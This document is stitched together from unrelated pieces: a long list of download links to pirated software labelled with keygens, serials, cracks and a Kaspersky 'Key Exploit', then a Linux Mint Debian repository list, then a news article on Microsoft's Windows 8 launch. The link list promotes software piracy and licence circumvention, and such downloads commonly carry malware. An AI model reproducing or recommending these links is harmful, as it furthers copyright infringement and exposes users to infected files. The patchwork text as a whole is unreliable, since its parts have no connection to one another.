http://www.2shared.com/file/geZVqiOd/500_True_Type_Fonts_ADilAns_H3.html

StuffIt Deluxe 2009 V13.0.0.19 Incl Keymaker-AGAiN-FuckOff
http://rapidshare.com/files/2341094071/StuffIt%20Deluxe%202009%20V13.0.0.19%20Incl%20Keymaker-AGAiN-FuckOff.zip

AMS Software Beauty Studio V1.57 Serial[Gladrag Manhunt]
http://www.2shared.com/file/NVRGAweM/AMS_Software_Beauty_Studio_V15.html

Mojosoft Photo Frame Studio V2.6 Multilang By Cool Release
http://www.2shared.com/file/detHqGKd/Mojosoft_Photo_Frame_Studio_V2.html

Virtual CD 9 3 0 0
http://rapidshare.com/files/360030280/Virtual%20CD%209%203%200%200.zip

DVDFab Platinum V8.1.0.8 Qt Beta Patch
http://rapidgator.net/file/47381362/DVDFab_Platinum_V8.1.0.8_Qt_Beta_Patch.zip.html

THE FOUNDRY NUKEX V6.0V5
http://www.2shared.com/file/_xiqMnaz/THE_FOUNDRY_NUKEX_V60V5.html

Nero Burning[[color=red] DONOT[ Color] DOWNLOAD WRONG FILE REALLY SORRY GUYS]
http://www.2shared.com/file/Etra0tS8/Nero_Burningcolorred_DONOT_Col.html

Pinnacle Studio
http://rapidgator.net/file/47381420/Pinnacle_Studio.zip.html

Windows Diamond 2010 All In One Multibootable CD(h33t)(trees)
http://www.2shared.com/file/y5nx--bV/Windows_Diamond_2010_All_In_On.html

Error Handling PHP Scripts
http://rapidgator.net/file/47381482/Error_Handling_PHP_Scripts.zip.html

Nexus2 Hollywood Expansion [VicBeatz]
http://www.2shared.com/file/eMWzPRY5/Nexus2_Hollywood_Expansion_Vic.html

Battle For Vesta V2 0 1 IPhone IPod Touch-COREPDA
http://rapidgator.net/file/47381517/Battle_For_Vesta_V2_0_1_IPhone_IPod_Touch-COREPDA.zip.html

FAQ And Knowledgebase PHP Scripts
http://www.2shared.com/file/oleLICfi/FAQ_And_Knowledgebase_PHP_Scri.html

Word List Expert V2 0 1
http://rapidgator.net/file/47381584/Word_List_Expert_V2_0_1.zip.html

Fairstars Audio Converter 1.93 Serial [TIMETRAVEL][H33T]
http://www.2shared.com/file/OJ9L4QLT/Fairstars_Audio_Converter_193_.html

Deluxe Menu V3 2 3 6 UNiQUE
http://rapidgator.net/file/47381695/Deluxe_Menu_V3_2_3_6_UNiQUE.zip.html

Fix Cleaner(Clean Speedup) 1.3 - Rubak
http://www.2shared.com/file/STT97MBU/Fix_Cleaner_Clean_Speedup__13_.html

PLANIT EDGECAM V2010 R1-MAGNiTUDE
http://rapidgator.net/file/47381762/PLANIT_EDGECAM_V2010_R1-MAGNiTUDE.zip.html

Samsung Studio Software Op Win 7 2Lions-Team
http://www.2shared.com/file/f4gAoTct/Samsung_Studio_Software_Op_Win.html

NsAuditor SpotAuditor V3.8.2 - McFilthyNasty
http://rapidgator.net/file/47381873/NsAuditor_SpotAuditor_V3.8.2_-_McFilthyNasty.zip.html

4Videosoft Video Converter Platinum V3 2 06-QUANTiZE
http://www.2shared.com/file/IYq7SdR6/4Videosoft_Video_Converter_Pla.html

Blaze Video HDTV Player V6.0
http://rapidgator.net/file/47381965/Blaze_Video_HDTV_Player_V6.0.zip.html

Ace Translator 8.1.0.392 Software Serial Key
http://www.2shared.com/file/FIuTNGxj/Ace_Translator_810392_Software.html

Avast! Free Antivirus V5.0.377[Multi]
http://rapidgator.net/file/47382061/Avast!_Free_Antivirus_V5.0.377[Multi].zip.html

Android SDK Offline 2011 09 14
http://www.2shared.com/file/WF22g5jr/Android_SDK_Offline_2011_09_14.html

PhotoFiltre Studio X 10.1.0 Serial Key Crack Keygen By ThisIsMyDemo
http://rapidgator.net/file/47382285/PhotoFiltre_Studio_X_10.1.0_Serial_Key_Crack_Keygen_By_ThisIsMyDemo.zip.html

AVG Antivirus Professional 8.10.96 Serial [h33t] [dopeboy]
http://www.2shared.com/file/W9ypUbaB/AVG_Antivirus_Professional_810.html

Ringtones IPhone 3GS - HoNeST
http://www.2shared.com/file/5cPwV1rB/Ringtones_IPhone_3GS_-_HoNeST.html

SBSH ILauncher Version 3.1 For The Pocket PC
http://rapidgator.net/file/47382350/SBSH_ILauncher_Version_3.1_For_The_Pocket_PC.zip.html

25 Beautiful CSS Templates
http://www.2shared.com/file/HizOXr2B/25_Beautiful_CSS_Templates.html

Inzone Click To Convert V6 0 Incl Keygen-BRD
http://rapidgator.net/file/47382427/Inzone_Click_To_Convert_V6_0_Incl_Keygen-BRD.zip.html

Java Runtime Environment 1.7.0.5 (32-bit-x64) Latest
http://www.2shared.com/file/6K3LyPLv/Java_Runtime_Environment_1705_.html

Kaspersky 2011 Internet Security Anti-Virus V11.0.2.55 Key Exploit V0.534 (9873 Days License)
http://www.2shared.com/file/T9TF_guV/Kaspersky_2011_Internet_Securi.html

Elcor TweakRAM V7.1.5.31 Multilingual By Adrian Dennis
http://rapidgator.net/file/47381476/Elcor_TweakRAM_V7.1.5.31_Multilingual_By_Adrian_Dennis.zip.html

VLC Remote V5 51 IPhone IPod Touch IPad-ARBiTRAGEPDA
http://www.2shared.com/file/n9hnFDFx/VLC_Remote_V5_51_IPhone_IPod_T.html

Linux Journal Issue #181 - May 2009 True PDF (Malestrom)
http://rapidgator.net/file/47381504/Linux_Journal_Issue_#181_-_May_2009_True_PDF_(Malestrom).zip.html

CorelDRAW Graphics Suite X5. ( With Working Keygen )
http://rapidgator.net/file/47381552/CorelDRAW_Graphics_Suite_X5._(_With_Working_Keygen_).zip.html

Spy Emergency 2009 [ Kentuckykiid ]
http://www.2shared.com/file/FF6NhkwH/Spy_Emergency_2009__Kentuckyki.html

Spyware Doctor V6 Genuine Serial [ Kentuckykiid ]
http://rapidgator.net/file/47381635/Spyware_Doctor_V6_Genuine_Serial_[_Kentuckykiid_].zip.html

BLACKRA1N JAILBREAK- NEW FOR IPHONE IPHONETEAM
http://rapidgator.net/file/47381641/BLACKRA1N_JAILBREAK-_NEW_FOR_IPHONE_IPHONETEAM.zip.html

500 Office Templates[h33t][Dave3737]
http://www.2shared.com/file/_TqeRtD6/500_Office_Templatesh33tDave37.html

Axara Video Converter 3.5.9.864 Serial [TIMETRAVEL][H33T]
http://rapidgator.net/file/47381794/Axara_Video_Converter_3.5.9.864_Serial_[TIMETRAVEL][H33T].zip.html

Ace Utilities 5.1.0 Build 465 - Final(trees)
http://rapidgator.net/file/47381799/Ace_Utilities_5.1.0_Build_465_-_Final(trees).zip.html

Overloud Mark Studio 1 V1 1 VST X64-DYNAMiCS
http://www.2shared.com/file/U9JZFezh/Overloud_Mark_Studio_1_V1_1_VS.html

Kaspersky Antivirus 2011 (23rd July) Working Keys-ECLiPSE HD
http://rapidgator.net/file/47381889/Kaspersky_Antivirus_2011_(23rd_July)_Working_Keys-ECLiPSE_HD.zip.html

ESET NOD32 Antivirus $ Smart Security 4 0 314 X32 $ X64 Fixes [VirusTotal Com]
http://rapidgator.net/file/47381895/ESET_NOD32_Antivirus_$_Smart_Security_4_0_314_X32_$_X64_Fixes_[VirusTotal_Com].zip.html

Accord CD Ripper Xtreme 6.3.5
http://www.2shared.com/file/YBkifo-G/Accord_CD_Ripper_Xtreme_635.html

LMDE 201204 - sources.list

deb http://packages.linuxmint.com/ debian main upstream import
deb http://mirror.rts-informatique.fr/linuxmint/debian/latest testing main contrib non-free
deb http://mirror.rts-informatique.fr/linuxmint/debian/latest/security testing/updates main contrib non-free
deb http://mirror.rts-informatique.fr/linuxmint/debian/latest/multimedia testing main non-free

##Ez a Systemback alkalmazásé, jobb felvenni a PPA-t vagy hagyd ki!
#http://ubuntu.hu/node/29725
#sudo add-apt-repository ppa:nemh/systemback
#sudo apt-get update
#sudo apt-get install systemback
#deb http://ppa.launchpad.net/nemh/systemback/ubuntu lucid main
#deb-src http://ppa.launchpad.net/nemh/systemback/ubuntu lucid main

Hope over Windows 8

The past decade saw Microsoft Corporation, the company that two decades ago gave us the proprietary Windows operating system, take a nose dive — from being the market leader to losing out in one tech area after the other, search, social networking, email, music and mobility.
A late entrant into the mobility game, where globally tablets have been replacing the good old personal computer, Microsoft’s new operating system, Windows 8, is its last-ditch attempt at reclaiming the space it has yielded over the years to its tech rivals, Apple Inc. and Google Inc.
This release, slated for October 26, represents a major rethink for the software major, one that acknowledges the tectonic shift in technological choice: from desktops, then laptops to tablets and smartphones.
First impressions look good. At the Windows AppFest that Microsoft organised in Bangalore in an attempt to build traction around the upcoming release, Microsoft gave journalists a detailed demo of Windows 8. We tried out Windows on tablets as well as desktops, but the news is that there’s no difference — it’s one OS that fits both (unlike Apple that has iOS and OS X, and Google that’s building Chrome for netbooks and has Android for mobile).
There’s no doubt that the interfaces are slick, smooth and offer a lot of scope to organise. It’s quite intuitive, and going by what they show of the user experience, it’s an attempt to blur the line between the traditional desktop and tablet experience. It is packed with new features and, understandably, there’s a learning curve, but it is all quite interesting.
The main feature of the new look is that the entire user interface is arranged into neat tiles. These tiles, that are grouped together (you can change the grouping to suit your usage style) represent different services and applications. This interface resembles Metro, its Windows Phone interface where it is called ‘Live Tiles’. Under the tiles you can view live updates for each of your services.
The other big-ticket technological offering is integration with the cloud and social media. The Microsoft executive giving the demo spent a lot of time on photo-sharing features, and on how the new feature set makes updating or connecting with friends on multiple social networks or email clients easy. At the media interactions, top India leaders described the product as a “radical game-changer”.
One of them even compared it to Windows 95, which introduced 32-bit computing to home PCs and represented a “generation shift” in computing.
While techies at Microsoft are visibly excited, the hard truth is that Microsoft needs this product to succeed not only in order to remain relevant but also to resuscitate its market value. In July this year, Microsoft reported its first quarterly loss, a net loss of $492 million. This is the first time the corporation saw net profits dip after it went public in 1986.
While some of this had to do with the grim market environment, a lot of this is expected given that personal computer sales have been stagnant for a few years now, and registered a decline in recent quarters. Analysts have also been harping on that unless Microsoft comes up with a product that’s a real game-changer, it can barely hope to catch up with its adversaries. Microsoft also hopes that the new touch-friendly product will make some impact among enterprise clients, where its major revenues lie.

It’s also being widely reported that tablets being shipped with Windows 8 are planning on offering snap-on keyboards. This will mark a shift from the ‘touch-only’ approach to computing, and several hardware biggies including Samsung, HP and Acer are set to do this.
Tablet makers perhaps hope that this add-on could wean consumers away from Apple’s iPad, which remains a market leader in this segment. This detachable keyboard, which was part of the demo equipment shown here, is sleek and goes well with the device design.
Samsung’s already demoed a new version of Slate, which runs on Windows 8 and will hit the market on the same date as Windows 8. This keyboard costs a little less than $ 100, which seems to be a good bargain for those who still struggle with typing on touch, or feel they’d like it if their tablets could double as more traditional computing devices